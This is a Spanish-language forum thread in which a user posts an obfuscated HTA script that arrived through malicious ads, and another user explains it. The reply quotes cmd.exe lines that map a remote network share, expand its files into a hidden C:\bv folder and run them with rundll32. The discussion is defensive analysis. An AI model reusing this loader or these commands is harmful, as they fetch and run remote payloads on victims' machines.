Nuevo malware via archivo HTA
(1/1)
Flamer:
Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente
Código:
<script>
document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")
</script>
asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto
por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo
saludos Flamer y mi navegador chrome me lo marca como peligroso
EdePC:
los hta son un peligro, puedes ejecutar comandos CMD ahí mismo y con eso haces de todo
Por lo que vi hace un "net use" para añadir una carpeta compartida desde Internet, luego descomprime lo que hay en esa carpeta compartida en otra carpeta oculta que crea en C:\, y empieza a ejecutar todo eso que descomprimió.
"C:\Windows\System32\cmd.exe" /c timeout 135 && forfiles /p c:\bv\ /m *.* /s /c "cmd /c rundll32 @path,ejm"
"C:\Windows\System32\cmd.exe" /c md c:\bv && attrib +h c:\bv && net use n: \\1p.si@ssltxf\t && forfiles /p n:\ /m *.* /s /c "cmd /c expand -r @path c:\bv" && net use n: /d /y
Flamer:
orale gracias
Navegación